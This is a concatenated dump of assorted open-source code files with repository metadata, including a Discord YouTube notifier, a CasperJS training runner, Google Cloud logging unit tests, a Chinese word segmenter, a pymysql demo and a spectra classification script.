[
"MIT"
] | null | null | null |
curso-em-video/resposta_usuario.py
|
mvrramos/Pogramacao-Python
|
4b289372aed3080c55a94beed3ea059619d51e48
|
[
"MIT"
] | null | null | null |
curso-em-video/resposta_usuario.py
|
mvrramos/Pogramacao-Python
|
4b289372aed3080c55a94beed3ea059619d51e48
|
[
"MIT"
] | null | null | null |
# Substituir nome
nome = input('Qual o seu nome?')
print ('Olá', nome,'!Prazer em te conhecer')
| 19.4
| 44
| 0.670103
|
8b8a145022b79df3bd47a980ce6d18a5ffcf9bbb
| 1,540
|
py
|
Python
|
src/get_groundtruth.py
|
maumueller/ldp-jaccard
|
5b956a11b6bdbfebbc2e6c3ad730426ffaa6b071
|
[
"MIT"
] | 1
|
2021-09-11T12:57:18.000Z
|
2021-09-11T12:57:18.000Z
|
src/get_groundtruth.py
|
maumueller/ldp-jaccard
|
5b956a11b6bdbfebbc2e6c3ad730426ffaa6b071
|
[
"MIT"
] | null | null | null |
src/get_groundtruth.py
|
maumueller/ldp-jaccard
|
5b956a11b6bdbfebbc2e6c3ad730426ffaa6b071
|
[
"MIT"
] | null | null | null |
from helpers import jaccard
from dataset_reader import read_data
import random
import pickle
import sys
def to_set(X):
Y = [set(x) for x in X.values()]
return Y
def bruteforce(X):
distances = {}
for i, x in enumerate(X):
for j, y in enumerate(X):
distances.setdefault(i, []).append((j, jaccard(x, y)))
for k in distances:
distances[k].sort(key=lambda x: -x[1])
return distances
def find_interesting_queries(X, query_id):
distances = bruteforce(X)
if query_id:
return [query_id], distances
else:
interesting_queries = []
for k in distances:
if distances[k][10][1] > 0.2:
interesting_queries.append(k)
print(len(interesting_queries))
random.shuffle(interesting_queries)
return interesting_queries[:50], distances
if __name__ == '__main__':
ds = sys.argv[1]
tau = int(sys.argv[2])
random.seed(12345)
attributes = {
"ds": ds,
"tau": tau
}
query_id = None
if len(sys.argv) == 4:
query_id = int(sys.argv[3])
dataset = to_set(read_data(ds))
new_dataset = []
for x in dataset:
if len(x) >= tau:
new_dataset.append(x)
print(len(dataset))
print(len(new_dataset))
queries, ground_truth = find_interesting_queries(new_dataset, query_id)
with open(ds + "." + str(tau) + '.pickle', 'wb') as f:
pickle.dump([queries, ground_truth, attributes],
f, pickle.HIGHEST_PROTOCOL)
| 23.333333
| 75
| 0.597403
|
8eda6358c4f36029757b473193f92cb9bfc3af2a
| 3,178
|
py
|
Python
|
main.py
|
yash935/Discord-YouTube-Notifier
|
138164923380d90b30c4eb70d3f34b59a270d53d
|
[
"MIT"
] | null | null | null |
main.py
|
yash935/Discord-YouTube-Notifier
|
138164923380d90b30c4eb70d3f34b59a270d53d
|
[
"MIT"
] | null | null | null |
main.py
|
yash935/Discord-YouTube-Notifier
|
138164923380d90b30c4eb70d3f34b59a270d53d
|
[
"MIT"
] | null | null | null |
import discord
import time
import asyncio
import sys
import os
from Implementation import YouTuber
from config import Config
config = Config('config.yml')
client = discord.Client()
youtubers = config.getYouTubersList() if (config.getYouTubersNr() != 0) else sys.exit()
if (config.getDiscordChannelNr() == 0): sys.exit()
id = ''
GOOGLE_API = config.getConnectionData()[0]
pingEveryXMinutes = config.getPingTime()
threads = []
processes = []
i = 0
while i < config.getYouTubersNr():
temp_list = []
temp_list.append(config.getYouTubersList()[i]['name'])
temp_list.append(id) if not config.getYouTubersList()[i]['channelID'] else temp_list.append(config.getYouTubersList()[i]['channelID'])
temp_list.append(True) if not id else temp_list.append(False)
temp_list.append('')
threads.append(temp_list)
i += 1
i = 0
while i < config.getYouTubersNr():
processes.append(YouTuber(GOOGLE_API, threads[i][1], threads[i][2]))
i += 1
async def update():
while True:
try:
waittime = pingEveryXMinutes * 60
item = 0
while item < config.getYouTubersNr():
data = processes[item].update()
print('Checking for new videos from {}'.format(threads[item][0]))
if processes[item].isNewVideo():
print('{} HAS UPLOADED A NEW VIDEO! PUSHING UPDATE ON DISCORD.'.format(threads[item][0]))
for x in range (0, config.getDiscordChannelNr()):
newvideo = config.getDiscordChannelList()[x]['New video'].format(threads[item][0]) + '\n{}'.format(processes[item].getVideoLink(processes[item].videosData[0][1]))
await client.send_message(client.get_channel(str(config.getDiscordChannelList()[x]['channelID'])), newvideo)
if processes[item].isUserLive():
if not processes[item].liveId == threads[item][3]:
print('{} IS LIVESTREAMING NOW! PUSHING UPDATE ON DISCORD.'.format(threads[item][0]))
threads[item][3] = processes[item].liveId
for x in range (0, config.getDiscordChannelNr()):
livestream = config.getDiscordChannelList()[x]['Livestream'].format(threads[item][0]) + '\n{}'.format(processes[item].getVideoLink(processes[item].getUserLiveData()))
await client.send_message(client.get_channel(str(config.getDiscordChannelList()[x]['channelID'])), livestream)
item += 1
except:
pass
while waittime > 0:
mins, secs = divmod(waittime, 60)
timeformat = '{:02d}:{:02d}'.format(mins, secs)
sys.stdout.write('Rechecking in ' + str(timeformat) + '\r')
waittime -= 1
await asyncio.sleep(1)
@client.event
async def on_ready():
print('Logged in as:')
print(client.user.name)
print(client.user.id)
print('---------------------------------------')
print('Bot running.')
asyncio.ensure_future(update())
client.run(os.getenv('Token'))
| 41.272727
| 195
| 0.592196
|
bbce2c403c6f555de8a6fb0c1df763953862b012
| 2,954
|
py
|
Python
|
google-trainer-code-only/train.py
|
teogenesmoura/pesquisaGoogle
|
6f3d5e90a316ada9a7060097da20f6b341b82ec4
|
[
"MIT"
] | null | null | null |
google-trainer-code-only/train.py
|
teogenesmoura/pesquisaGoogle
|
6f3d5e90a316ada9a7060097da20f6b341b82ec4
|
[
"MIT"
] | null | null | null |
google-trainer-code-only/train.py
|
teogenesmoura/pesquisaGoogle
|
6f3d5e90a316ada9a7060097da20f6b341b82ec4
|
[
"MIT"
] | null | null | null |
import sys
import csv
import os
# from subprocess import call
from subprocess import Popen, PIPE, STDOUT
import datetime
now = datetime.datetime.strftime(datetime.datetime.now(), '%Y%m%d%H%M')
folder = now + '-training'
users_filename = 'input/users-prod.csv'
f = open(users_filename, 'r')
print('Reading %s file' % users_filename)
users_reader = csv.reader(open(users_filename))
for row in users_reader:
print("------------------------------------------------")
print('Reading next user in %s: %s' % (users_filename,row))
email = row[0]
passwd = row[1]
alias = row[2]
queries = ""
queries_filename = 'input/queries-%s.csv' % alias
queries_reader = csv.reader(open(queries_filename))
print('Reading %s file' % queries_filename)
for query_row in queries_reader:
query = query_row[0]
# print(query)
if queries:
queries = queries + "," + query
else:
queries = query
urls = ""
urls_filename = 'input/urls-%s.csv' % alias
urls_reader = csv.reader(open(urls_filename))
print('Reading %s file' % urls_filename)
for url_row in urls_reader:
url = url_row[0]
# print(url)
if urls:
urls = urls + "," + url
else:
urls = url
# print("\n\n")
print("\n[%s] Starting training of %s" % (now,alias))
print("")
print('Terms to be Googled: %s\n' % queries)
print('URLs to be visited: %s\n' % urls)
casper_cmd = "./casperjs train.js %s %s %s %s %s %s" % (folder, email, passwd, alias, queries, urls)
casper_logfile = "output/%s-treinamento.%s.output.txt" % (now,alias)
print('Calling CasperJS script to emulate browser navigation...')
print('Check file %s for details' % casper_logfile)
print('Here is the command about to be executed:\n')
print('$ %s\n' % casper_cmd)
sys.stdout.flush()
# call(["./casperjs", "train.js", folder, email, passwd, alias, queries, urls, "| tee -a", "output/treinamento.$(date +%Y%m%d%H%M).output.txt"])
# p = Popen(["./casperjs", "train.js", folder, email, passwd, alias, queries, urls], stdin=PIPE, stdout=PIPE, stderr=PIPE)
# # output, err = p.communicate(b"input data that is passed to subprocess' stdin")
# output, err = p.communicate()
# rc = p.returncode
p1 = Popen(["./casperjs", "train.js", folder, email, passwd, alias, queries, urls], stdout=PIPE)
p2 = Popen(["tee", casper_logfile], stdin=p1.stdout)
p1.stdout.close() # Allow p1 to receive a SIGPIPE if p2 exits.
output = p2.communicate()[0]
status = p2.returncode
print('Status code',status)
if status != 0:
print('CasperJS Failed')
sys.exit('CasperJS falhou')
# os.system("cd output; zip %s-training.zip %s-training/*; cd .." % (now,now))
print("[%s] Finishing %s's training\n\n" % (now,alias))
# outfile = open("output/%s/treinamento.%s.%s.output.txt" % (folder,alias,now))
# outfile.write(output)
# outfile.flush()
# outfile.close()
# errfile = open("output/%s/treinamento.%s.%s.errors.txt" % (folder,alias,now))
# errfile.write(err)
# errfile.flush()
# errfile.close()
| 29.247525
| 145
| 0.658091
|
1f2379e3e17b3da850cf5cc83694299db334bbbe
| 266
|
py
|
Python
|
hmtl/training/metrics/__init__.py
|
rahular/joint-coref-srl
|
cd85fb4e11af1a1ea400ed657d0a4511c1d6c6be
|
[
"MIT"
] | null | null | null |
hmtl/training/metrics/__init__.py
|
rahular/joint-coref-srl
|
cd85fb4e11af1a1ea400ed657d0a4511c1d6c6be
|
[
"MIT"
] | null | null | null |
hmtl/training/metrics/__init__.py
|
rahular/joint-coref-srl
|
cd85fb4e11af1a1ea400ed657d0a4511c1d6c6be
|
[
"MIT"
] | null | null | null |
# coding: utf-8
from hmtl.training.metrics.relation_f1_measure import RelationF1Measure
from hmtl.training.metrics.conll_coref_full_scores import ConllCorefFullScores
from hmtl.training.metrics.accuracy import Accuracy
from hmtl.training.metrics.f1_score import F1
| 38
| 78
| 0.868421
|
d1fe222808ca4d706df3b3dc7f5605463fd2a300
| 1,420
|
py
|
Python
|
snownlp/seg/seg.py
|
erning/snownlp
|
90c07d31269421d0868f34b37868380d44e034b6
|
[
"MIT"
] | 1
|
2017-03-23T01:52:24.000Z
|
2017-03-23T01:52:24.000Z
|
snownlp/seg/seg.py
|
erning/snownlp
|
90c07d31269421d0868f34b37868380d44e034b6
|
[
"MIT"
] | null | null | null |
snownlp/seg/seg.py
|
erning/snownlp
|
90c07d31269421d0868f34b37868380d44e034b6
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import unicode_literals
import codecs
from ..utils.tnt import TnT
from .y09_2047 import CharacterBasedGenerativeModel
class Seg(object):
def __init__(self, name='tnt'):
if name == 'tnt':
self.segger = TnT()
else:
self.segger = CharacterBasedGenerativeModel()
def save(self, fname, iszip=False):
self.segger.save(fname, iszip)
def load(self, fname, iszip=False):
self.segger.load(fname, iszip)
def train(self, file_name):
fr = codecs.open(file_name, 'r', 'utf-8')
data = []
for i in fr:
line = i.strip()
if not line:
continue
tmp = map(lambda x: x.split('/'), line.split())
data.append(tmp)
fr.close()
self.segger.train(data)
def seg(self, sentence):
ret = self.segger.tag(sentence)
tmp = ''
for i in ret:
if i[1] == 'e':
yield tmp+i[0]
tmp = ''
elif i[1] == 'b' or i[1] == 's':
if tmp:
yield tmp
tmp = i[0]
else:
tmp += i[0]
if tmp:
yield tmp
if __name__ == '__main__':
seg = Seg()
seg.train('data.txt')
print(' '.join(seg.seg('主要是用来放置一些简单快速的中文分词和词性标注的程序')))
| 24.482759
| 59
| 0.505634
|
e4e93279b2808be757e128f9b6d703bff752725a
| 9,674
|
py
|
Python
|
unit_tests/logging/test_metric.py
|
Ofekmeister/google-cloud-python
|
07dd51bc447beca67b8da1c66f1dfb944ef70418
|
[
"Apache-2.0"
] | null | null | null |
unit_tests/logging/test_metric.py
|
Ofekmeister/google-cloud-python
|
07dd51bc447beca67b8da1c66f1dfb944ef70418
|
[
"Apache-2.0"
] | null | null | null |
unit_tests/logging/test_metric.py
|
Ofekmeister/google-cloud-python
|
07dd51bc447beca67b8da1c66f1dfb944ef70418
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
class TestMetric(unittest.TestCase):
PROJECT = 'test-project'
METRIC_NAME = 'metric-name'
FILTER = 'logName:syslog AND severity>=ERROR'
DESCRIPTION = 'DESCRIPTION'
def _getTargetClass(self):
from google.cloud.logging.metric import Metric
return Metric
def _makeOne(self, *args, **kw):
return self._getTargetClass()(*args, **kw)
def test_ctor_defaults(self):
FULL = 'projects/%s/metrics/%s' % (self.PROJECT, self.METRIC_NAME)
client = _Client(self.PROJECT)
metric = self._makeOne(self.METRIC_NAME, client=client)
self.assertEqual(metric.name, self.METRIC_NAME)
self.assertEqual(metric.filter_, None)
self.assertEqual(metric.description, '')
self.assertTrue(metric.client is client)
self.assertEqual(metric.project, self.PROJECT)
self.assertEqual(metric.full_name, FULL)
self.assertEqual(metric.path, '/%s' % (FULL,))
def test_ctor_explicit(self):
FULL = 'projects/%s/metrics/%s' % (self.PROJECT, self.METRIC_NAME)
client = _Client(self.PROJECT)
metric = self._makeOne(self.METRIC_NAME, self.FILTER,
client=client, description=self.DESCRIPTION)
self.assertEqual(metric.name, self.METRIC_NAME)
self.assertEqual(metric.filter_, self.FILTER)
self.assertEqual(metric.description, self.DESCRIPTION)
self.assertTrue(metric.client is client)
self.assertEqual(metric.project, self.PROJECT)
self.assertEqual(metric.full_name, FULL)
self.assertEqual(metric.path, '/%s' % (FULL,))
def test_from_api_repr_minimal(self):
client = _Client(project=self.PROJECT)
FULL = 'projects/%s/metrics/%s' % (self.PROJECT, self.METRIC_NAME)
RESOURCE = {
'name': self.METRIC_NAME,
'filter': self.FILTER,
}
klass = self._getTargetClass()
metric = klass.from_api_repr(RESOURCE, client=client)
self.assertEqual(metric.name, self.METRIC_NAME)
self.assertEqual(metric.filter_, self.FILTER)
self.assertEqual(metric.description, '')
self.assertTrue(metric._client is client)
self.assertEqual(metric.project, self.PROJECT)
self.assertEqual(metric.full_name, FULL)
def test_from_api_repr_w_description(self):
client = _Client(project=self.PROJECT)
FULL = 'projects/%s/metrics/%s' % (self.PROJECT, self.METRIC_NAME)
DESCRIPTION = 'DESCRIPTION'
RESOURCE = {
'name': self.METRIC_NAME,
'filter': self.FILTER,
'description': DESCRIPTION,
}
klass = self._getTargetClass()
metric = klass.from_api_repr(RESOURCE, client=client)
self.assertEqual(metric.name, self.METRIC_NAME)
self.assertEqual(metric.filter_, self.FILTER)
self.assertEqual(metric.description, DESCRIPTION)
self.assertTrue(metric._client is client)
self.assertEqual(metric.project, self.PROJECT)
self.assertEqual(metric.full_name, FULL)
def test_create_w_bound_client(self):
client = _Client(project=self.PROJECT)
api = client.metrics_api = _DummyMetricsAPI()
metric = self._makeOne(self.METRIC_NAME, self.FILTER, client=client)
metric.create()
self.assertEqual(
api._metric_create_called_with,
(self.PROJECT, self.METRIC_NAME, self.FILTER, ''))
def test_create_w_alternate_client(self):
client1 = _Client(project=self.PROJECT)
client2 = _Client(project=self.PROJECT)
api = client2.metrics_api = _DummyMetricsAPI()
metric = self._makeOne(self.METRIC_NAME, self.FILTER, client=client1,
description=self.DESCRIPTION)
metric.create(client=client2)
self.assertEqual(
api._metric_create_called_with,
(self.PROJECT, self.METRIC_NAME, self.FILTER, self.DESCRIPTION))
def test_exists_miss_w_bound_client(self):
client = _Client(project=self.PROJECT)
api = client.metrics_api = _DummyMetricsAPI()
metric = self._makeOne(self.METRIC_NAME, self.FILTER, client=client)
self.assertFalse(metric.exists())
self.assertEqual(api._metric_get_called_with,
(self.PROJECT, self.METRIC_NAME))
def test_exists_hit_w_alternate_client(self):
RESOURCE = {
'name': self.METRIC_NAME,
'filter': self.FILTER,
}
client1 = _Client(project=self.PROJECT)
client2 = _Client(project=self.PROJECT)
api = client2.metrics_api = _DummyMetricsAPI()
api._metric_get_response = RESOURCE
metric = self._makeOne(self.METRIC_NAME, self.FILTER, client=client1)
self.assertTrue(metric.exists(client=client2))
self.assertEqual(api._metric_get_called_with,
(self.PROJECT, self.METRIC_NAME))
def test_reload_w_bound_client(self):
NEW_FILTER = 'logName:syslog AND severity>=INFO'
RESOURCE = {
'name': self.METRIC_NAME,
'filter': NEW_FILTER,
}
client = _Client(project=self.PROJECT)
api = client.metrics_api = _DummyMetricsAPI()
api._metric_get_response = RESOURCE
metric = self._makeOne(self.METRIC_NAME, self.FILTER, client=client,
description=self.DESCRIPTION)
metric.reload()
self.assertEqual(metric.filter_, NEW_FILTER)
self.assertEqual(metric.description, '')
self.assertEqual(api._metric_get_called_with,
(self.PROJECT, self.METRIC_NAME))
def test_reload_w_alternate_client(self):
NEW_FILTER = 'logName:syslog AND severity>=INFO'
RESOURCE = {
'name': self.METRIC_NAME,
'description': self.DESCRIPTION,
'filter': NEW_FILTER,
}
client1 = _Client(project=self.PROJECT)
client2 = _Client(project=self.PROJECT)
api = client2.metrics_api = _DummyMetricsAPI()
api._metric_get_response = RESOURCE
metric = self._makeOne(self.METRIC_NAME, self.FILTER, client=client1)
metric.reload(client=client2)
self.assertEqual(metric.filter_, NEW_FILTER)
self.assertEqual(metric.description, self.DESCRIPTION)
self.assertEqual(api._metric_get_called_with,
(self.PROJECT, self.METRIC_NAME))
def test_update_w_bound_client(self):
client = _Client(project=self.PROJECT)
api = client.metrics_api = _DummyMetricsAPI()
metric = self._makeOne(self.METRIC_NAME, self.FILTER, client=client)
metric.update()
self.assertEqual(
api._metric_update_called_with,
(self.PROJECT, self.METRIC_NAME, self.FILTER, ''))
def test_update_w_alternate_client(self):
client1 = _Client(project=self.PROJECT)
client2 = _Client(project=self.PROJECT)
api = client2.metrics_api = _DummyMetricsAPI()
metric = self._makeOne(self.METRIC_NAME, self.FILTER, client=client1,
description=self.DESCRIPTION)
metric.update(client=client2)
self.assertEqual(
api._metric_update_called_with,
(self.PROJECT, self.METRIC_NAME, self.FILTER, self.DESCRIPTION))
def test_delete_w_bound_client(self):
client = _Client(project=self.PROJECT)
api = client.metrics_api = _DummyMetricsAPI()
metric = self._makeOne(self.METRIC_NAME, self.FILTER, client=client)
metric.delete()
self.assertEqual(api._metric_delete_called_with,
(self.PROJECT, self.METRIC_NAME))
def test_delete_w_alternate_client(self):
client1 = _Client(project=self.PROJECT)
client2 = _Client(project=self.PROJECT)
api = client2.metrics_api = _DummyMetricsAPI()
metric = self._makeOne(self.METRIC_NAME, self.FILTER, client=client1)
metric.delete(client=client2)
self.assertEqual(api._metric_delete_called_with,
(self.PROJECT, self.METRIC_NAME))
class _Client(object):
def __init__(self, project):
self.project = project
class _DummyMetricsAPI(object):
def metric_create(self, project, metric_name, filter_, description):
self._metric_create_called_with = (
project, metric_name, filter_, description)
def metric_get(self, project, metric_name):
from google.cloud.exceptions import NotFound
self._metric_get_called_with = (project, metric_name)
try:
return self._metric_get_response
except AttributeError:
raise NotFound('miss')
def metric_update(self, project, metric_name, filter_, description):
self._metric_update_called_with = (
project, metric_name, filter_, description)
def metric_delete(self, project, metric_name):
self._metric_delete_called_with = (project, metric_name)
| 38.388889
| 77
| 0.658569
|
7dac23a2213d1fa709753bc3c927ab486417fce3
| 1,623
|
py
|
Python
|
mosaic/simulation/rules.py
|
JohnKurian/mosaic
|
bc985640844e10b9aded478d6ef7a5f286ab2d82
|
[
"BSD-3-Clause"
] | 6
|
2018-09-17T13:27:46.000Z
|
2021-09-03T15:46:15.000Z
|
mosaic/simulation/rules.py
|
JohnKurian/mosaic
|
bc985640844e10b9aded478d6ef7a5f286ab2d82
|
[
"BSD-3-Clause"
] | null | null | null |
mosaic/simulation/rules.py
|
JohnKurian/mosaic
|
bc985640844e10b9aded478d6ef7a5f286ab2d82
|
[
"BSD-3-Clause"
] | 2
|
2019-11-21T13:17:11.000Z
|
2020-11-30T03:32:41.000Z
|
class BaseRule():
def __init__(self, applied_to = []):
self.applied_to = applied_to
def test(self, list_nodes = []):
raise NotImplemented()
class DependanceRule(BaseRule):
def __init__(self, applied_to = [], parent = None):
super(DependanceRule, self).__init__(applied_to=applied_to)
self.parent = parent
def test(self):
raise NotImplemented()
class ChildRule(BaseRule):
def __init__(self, applied_to = [], parent = None, value = []):
super().__init__(applied_to = applied_to)
self.parent = parent
self.value = value
def test(self, list_nodes = []):
parent_value = None
has_node = [False] * len(self.applied_to)
for node_name, v in list_nodes:
if node_name == self.parent:
parent_value = v
if node_name in self.applied_to:
index = self.applied_to.index(node_name)
has_node[index] = True
return False if (parent_value not in self.value) and (True in has_node) else True
class ValueRule(BaseRule):
def __init__(self, constraints = []):
super().__init__(applied_to = [])
for c, v in constraints:
self.applied_to.append(c)
self.constraints = constraints
def test(self, list_nodes = []):
has_node = []
for node_name, v in list_nodes:
if node_name in self.applied_to:
index = self.applied_to.index(node_name)
has_node.append((self.constraints[index][1] == v))
return not (True in has_node and False in has_node)
| 30.622642
| 89
| 0.60382
|
5a52341673c0bafe099d95b4e2f74733a21001f7
| 3,164
|
py
|
Python
|
tests/test_creation.py
|
TobiasSkovgaardJepsen/cookiecutter-data-science-research
|
6505e7d379c56184d55351d9f3610269a6b31ae6
|
[
"MIT"
] | null | null | null |
tests/test_creation.py
|
TobiasSkovgaardJepsen/cookiecutter-data-science-research
|
6505e7d379c56184d55351d9f3610269a6b31ae6
|
[
"MIT"
] | 11
|
2018-09-18T08:05:20.000Z
|
2018-11-15T12:31:57.000Z
|
tests/test_creation.py
|
TobiasSkovgaardJepsen/cookiecutter-data-science-research
|
6505e7d379c56184d55351d9f3610269a6b31ae6
|
[
"MIT"
] | null | null | null |
import os
import pytest
from subprocess import check_output
from conftest import system_check
def no_curlies(filepath):
""" Utility to make sure no curly braces appear in a file.
That is, was jinja able to render everthing?
"""
with open(filepath, 'r') as f:
data = f.read()
template_strings = [
'{{',
'}}',
'{%',
'%}'
]
template_strings_in_file = [s in data for s in template_strings]
return not any(template_strings_in_file)
@pytest.mark.usefixtures("default_baked_project")
class TestCookieSetup(object):
def test_project_name(self):
project = self.path
if pytest.param.get('project_name'):
name = system_check('DrivenData')
assert project.name == name
else:
assert project.name == 'project_name'
def test_author(self):
setup_ = self.path / 'setup.py'
args = ['python', setup_, '--author']
p = check_output(args).decode('ascii').strip()
if pytest.param.get('author_name'):
assert p == 'DrivenData'
else:
assert p == 'Your name (or your organization/company/team)'
def test_readme(self):
readme_path = self.path / 'README.md'
assert readme_path.exists()
assert no_curlies(readme_path)
if pytest.param.get('project_name'):
with open(readme_path) as fin:
assert 'DrivenData' == next(fin).strip()
def test_setup(self):
setup_ = self.path / 'setup.py'
args = ['python', setup_, '--version']
p = check_output(args).decode('ascii').strip()
assert p == '0.1.0'
def test_license(self):
license_path = self.path / 'LICENSE'
assert license_path.exists()
assert no_curlies(license_path)
def test_license_type(self):
setup_ = self.path / 'setup.py'
args = ['python', setup_, '--license']
p = check_output(args).decode('ascii').strip()
if pytest.param.get('open_source_license'):
assert p == 'BSD-3'
else:
assert p == 'MIT'
def test_requirements(self):
reqs_path = self.path / 'Pipfile'
assert reqs_path.exists()
assert no_curlies(reqs_path)
def test_makefile(self):
makefile_path = self.path / 'Makefile'
assert makefile_path.exists()
assert no_curlies(makefile_path)
def test_folders(self):
expected_dirs = [
'data',
'data/external',
'data/interim',
'data/processed',
'data/raw',
'reference_material',
'models',
'notebooks',
'reports',
'reports/figures',
'src',
'src/data',
'src/features',
'src/models',
'src/visualization',
]
ignored_dirs = [
str(self.path)
]
abs_expected_dirs = [str(self.path / d) for d in expected_dirs]
abs_dirs, _, _ = list(zip(*os.walk(self.path)))
assert len(set(abs_expected_dirs + ignored_dirs) - set(abs_dirs)) == 0
| 29.027523
| 78
| 0.564159
|
7bf6e7a308f937e7eb401f28fae9ffaca6bb2088
| 764
|
py
|
Python
|
python全栈/day40/day40-1pymysql的查询语句操作.py
|
Ringo-li/python_exercise_100
|
2c6c42b84a88ffbbac30c67ffbd7bad3418eda14
|
[
"MIT"
] | null | null | null |
python全栈/day40/day40-1pymysql的查询语句操作.py
|
Ringo-li/python_exercise_100
|
2c6c42b84a88ffbbac30c67ffbd7bad3418eda14
|
[
"MIT"
] | null | null | null |
python全栈/day40/day40-1pymysql的查询语句操作.py
|
Ringo-li/python_exercise_100
|
2c6c42b84a88ffbbac30c67ffbd7bad3418eda14
|
[
"MIT"
] | null | null | null |
# 1.导入包
import pymysql
if __name__ == "__main__":
# 2.创建连接对象
conn = pymysql.connect(host="192.168.33.13",
port = 3306,
user = 'root',
password = 'mysql',
database = 'students',
charset = "utf8")
# 3.获取游标,目的是执行sql语句
cursor = conn.cursor()
# 4.执行sql语句
# 4.1准备sql语句
sql = "select * from students;"
# 4.2执行sql语句
cursor.execute(sql)
# 4.3获取第一条查询结果,类型是元组
# row = cursor.fetchone()
# print(row)
# 4.4获取多条返回结果,元组套元组格式
result = cursor.fetchall()
# print(result)
for row in result:
print(row)
# 5.关闭游标
cursor.close()
# 6.关闭连接
conn.close()
| 21.222222
| 51
| 0.477749
|
2f264c2a13cb62173a4cd3b38e58cfa6f208e893
| 5,942
|
py
|
Python
|
evaluate_new-sample.py
|
edsonjunior14/mp_classification
|
dafbec182afc6e787911ec9cf0948a472477c368
|
[
"MIT"
] | 5
|
2021-08-31T17:45:04.000Z
|
2022-01-14T18:40:08.000Z
|
evaluate_new-sample.py
|
edsonjunior14/mp_classification
|
dafbec182afc6e787911ec9cf0948a472477c368
|
[
"MIT"
] | null | null | null |
evaluate_new-sample.py
|
edsonjunior14/mp_classification
|
dafbec182afc6e787911ec9cf0948a472477c368
|
[
"MIT"
] | 3
|
2021-09-15T09:13:46.000Z
|
2022-03-09T09:17:28.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 13 19:55:56 2021
@author: scien
"""
#Standard packages
import os
import numpy as np
import pandas as pd
#Graphics packages
from matplotlib import pyplot as plt
#ML modules
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelEncoder
from imblearn.over_sampling import RandomOverSampler
from sklearn.metrics import accuracy_score
from sklearn.metrics import log_loss
from sklearn.base import clone
from sklearn.svm import SVC
#Project packages
from utils import build_row
from baseline import als
import config
mccv_path = config._get_path( 'mccv')
seed = config._seed()
def results_total(X, name, sufix):
filepath = os.path.join(mccv_path + '_newsample',
name, sufix + '.csv')
pd.DataFrame(data = X, columns= ['Cross_Entropy_train',
'Cross_Entropy_val',
'Accuracy_train',
'Accuracy_val']).to_csv(filepath,index=False)
def results(X, name, sufix):
filepath = os.path.join(mccv_path + '_newsample', name,
sufix + '.csv')
pd.DataFrame(data = X).to_csv(filepath, header=False, index=False)
path = os.path.join('data','new_sample.csv')
df = pd.read_csv(path,decimal=r',')
df.drop(columns=['Spectrum ID'], inplace=True)
y = df['Polymer'].copy()
X = df.drop(columns=['Polymer'])
freq = df['Polymer'].value_counts()
print('Previous class frequency:')
print(freq)
threshold = 10
less_rep = [idx for idx, value in freq.items() if value < threshold]
for i, row in df.iterrows():
if row['Polymer'] in less_rep:
df.at[i, 'Polymer'] = 'Unknown'
print('\n \n \n New class frequency (after removing Unkown):')
print(df['Polymer'].value_counts())
encoder = LabelEncoder()
y = encoder.fit_transform(df['Polymer'])
print("Running preprocessing...")
for idx, row in X.iterrows():
X.iloc[idx, :] = row - als(row)
base_model = SVC(kernel = 'linear', C = 100,
probability = True, random_state= seed)
n_class = np.unique(y).shape[0]
total_score = []
probability = [] #flattened
cross_matrix = [] #flattened
detailed_score = [] #flattened
name = 'baseline_SVC_linear_100.0'
for i in range(0, 1700):
X_train, X_val, y_train, y_val = train_test_split(X,
y,
stratify=y,
test_size= 1/3)
ros = RandomOverSampler()
X_train, y_train = ros.fit_resample(X_train, y_train)
model = clone(base_model)
model.fit(X_train, y_train)
predict_array = model.predict(X_val)
predicted_prob = model.predict_proba(X_val)
total_score.append([log_loss(y_train, model.predict_proba(X_train)),
log_loss(y_val, predicted_prob),
accuracy_score(np.array(y_train), model.predict(X_train)),
accuracy_score(np.array(y_val), predict_array)
])
flatten_probabilities = []
flatten_cross = []
for j in range(n_class):
idxs = np.where(y_val == j)[0] #idxs of true j-label
flatten_probabilities.extend(np.mean(predicted_prob[idxs], axis = 0))
flatten_cross_by_class = [len(np.where(predict_array[idxs] == k)[0])
for k in range(n_class) ]
flatten_cross.extend(flatten_cross_by_class)
cross_matrix.append(flatten_cross)
probability.append(flatten_probabilities)
detailed_score.append(build_row(X_val, y_val, predict_array))
results_total(total_score, name, 'total_score')
results(cross_matrix, name, 'cross_matrix')
results(probability, name, 'probability')
results(detailed_score, name, 'detailed_score')
names = encoder.inverse_transform([i for i in range(n_class)])
import seaborn as sns
graphics_path = config._get_path('graphics')
def cross_heatmap(df, name):
w = df.mean(axis=0).values.reshape(n_class, n_class) #ndarray
for i in range(n_class):
w[i] /= np.sum(w[i])
w = np.around(w, decimals=3)
cross_frame = pd.DataFrame(data = w, columns = names, index = names)
fig, ax = plt.subplots(figsize=(12, 7))
sns.heatmap(cross_frame, annot=True, linewidths= 1, cmap="YlGnBu", ax = ax)
ax.set_title('True class v.s. Predicted Class (mean)')
fig.savefig(os.path.join(graphics_path, name + '_cross_prediction.png'),
dpi = 1200,
bbox_inches = "tight")
def detailed_score_heatmap(df, name):
w = df.mean(axis=0).values.reshape(n_class, 4)
w = np.around(w, decimals=3)
score_frame = pd.DataFrame(data = w,
columns=['sensitivity', 'specificity',
'precision', 'f1_score'],
index = names)
fig, ax = plt.subplots(figsize=(7, 7))
#color_map = plt.get_cmap('YlGnBu_r')
#color_map = ListedColormap(color_map(np.linspace(0.1, 0.6, 256)))
sns.heatmap(score_frame,
annot=True, linewidths= 0.05, cmap='YlGnBu', ax = ax)
ax.set_title(name + ' Scores')
fig.savefig(os.path.join(graphics_path, name + '_detailed_score.png'),
dpi = 1200,
bbox_inches = "tight")
"""
def plot_sample(sample):
horizontal = [int(x.split('.')[0]) for x in sample.columns.values]
values = sample.values[0]
plt.xlabel("Wavelenght (1/cm)")
plt.plot(horizontal, values, color = config._blue, label = 'sample')
plt.plot(horizontal, values - als(values),
color = config._purple, label= 'sample (corrected)')
